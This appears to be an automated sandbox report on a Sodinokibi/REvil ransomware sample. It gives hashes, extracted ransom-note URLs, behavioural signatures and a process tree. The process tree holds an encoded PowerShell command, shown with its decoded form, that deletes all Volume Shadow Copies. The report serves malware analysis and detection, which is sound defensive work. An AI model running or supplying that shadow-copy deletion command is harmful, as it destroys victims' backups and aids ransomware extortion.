Analysis

  max time kernel:  124s
  max time network: 56s
  platform:         windows7_x64
  resource:         win7v200430
  submitted:        07-05-2020 21:49

Tasks

  Static task:      static1
  Behavioral task:  behavioral1
    Sample:   774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
    Resource: win7v200430
  Behavioral task:  behavioral2
    Sample:   774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
    Resource: win10v200430
General

  Target: 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
  Size:   975KB
  MD5:    cce629db2606ae98ba6e931adbf1aeae
  SHA1:   2649ce761c00f4505758e20580e8bdf3e8d559d1
  SHA256: 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d
  SHA512: 7f64fab63ce7117d131d28f9657cbd4b096e7b8ac959cacf4f876709678c26f37bdf8b4575d8c8aa8e4920c203cd938bd9d39b8425212301d57c4ed5ab906c96
Malware Config

  Extracted from: C:\4d7h7y-readme.txt
  sodinokibi
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/78174560FC96B22E
    http://decryptor.cc/78174560FC96B22E
Signatures

Suspicious use of SetWindowsHookEx (1 IoC)
  Processes:
    pid   process
    1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes:
    description                       pid   process
    Token: SeDebugPrivilege           1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
    Token: SeDebugPrivilege           1604  powershell.exe
    Token: SeBackupPrivilege          1164  vssvc.exe
    Token: SeRestorePrivilege         1164  vssvc.exe
    Token: SeAuditPrivilege           1164  vssvc.exe
    Token: SeTakeOwnershipPrivilege   1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
Modifies service (2 TTPs, 5 IoCs)
  Processes:
    description   ioc                                                                                                  process
    Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                             vssvc.exe
    Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}   vssvc.exe
    Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                            vssvc.exe
    Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                                   vssvc.exe
    Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer              vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes:
    description       ioc                                                                                                          process
    Set value (str)   \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zl44fj2hc26f.bmp"   774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Suspicious behavior: EnumeratesProcesses (75 IoCs)
  Processes:
    pid   process
    1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
    1604  powershell.exe
    1604  powershell.exe
    1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
    (every remaining entry of the 75 repeats the last row: pid 1020, 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe)
Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
    description                        pid   process                                                                 target process
    PID 1020 wrote to memory of 1604   1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe  powershell.exe
    PID 1020 wrote to memory of 1604   1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe  powershell.exe
    PID 1020 wrote to memory of 1604   1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe  powershell.exe
    PID 1020 wrote to memory of 1604   1020  774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe  powershell.exe
Drops file in Program Files directory (24 IoCs)
  Processes (all 24 entries belong to 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe):
    description                    ioc
    File opened for modification   \??\c:\program files\SetConfirm.mpeg3
    File created                   \??\c:\program files\4d7h7y-readme.txt
    File opened for modification   \??\c:\program files\ApproveResolve.dotx
    File opened for modification   \??\c:\program files\AssertConvert.TS
    File opened for modification   \??\c:\program files\AssertInvoke.vdx
    File opened for modification   \??\c:\program files\DismountClose.3gp2
    File opened for modification   \??\c:\program files\EnableSelect.jpe
    File created                   \??\c:\program files\microsoft sql server compact edition\4d7h7y-readme.txt
    File opened for modification   \??\c:\program files\SplitRemove.avi
    File opened for modification   \??\c:\program files\SubmitBackup.dib
    File opened for modification   \??\c:\program files\SubmitSuspend.gif
    File opened for modification   \??\c:\program files\UnprotectAssert.eps
    File opened for modification   \??\c:\program files\MoveSubmit.mpeg3
    File opened for modification   \??\c:\program files\PopPublish.WTV
    File opened for modification   \??\c:\program files\ResetRestart.tiff
    File opened for modification   \??\c:\program files\SubmitJoin.docx
    File opened for modification   \??\c:\program files\UnblockRevoke.xltm
    File opened for modification   \??\c:\program files\UndoSuspend.ini
    File created                   \??\c:\program files\microsoft sql server compact edition\v3.5\4d7h7y-readme.txt
    File created                   \??\c:\program files (x86)\4d7h7y-readme.txt
    File opened for modification   \??\c:\program files\ConvertToPing.wav
    File opened for modification   \??\c:\program files\ImportResize.3gpp
    File opened for modification   \??\c:\program files\OutNew.mht
    File created                   \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\4d7h7y-readme.txt
Processes

C:\Users\Admin\AppData\Local\Temp\774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe"
  PID: 1020
  Signatures:
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of AdjustPrivilegeToken
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - Drops file in Program Files directory
  Child process:
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which deletes every Volume Shadow Copy, matching the vssvc.exe activity recorded under "Modifies service")
      PID: 1604
      Signatures:
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 524

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1164
  Signatures:
    - Suspicious use of AdjustPrivilegeToken
    - Modifies service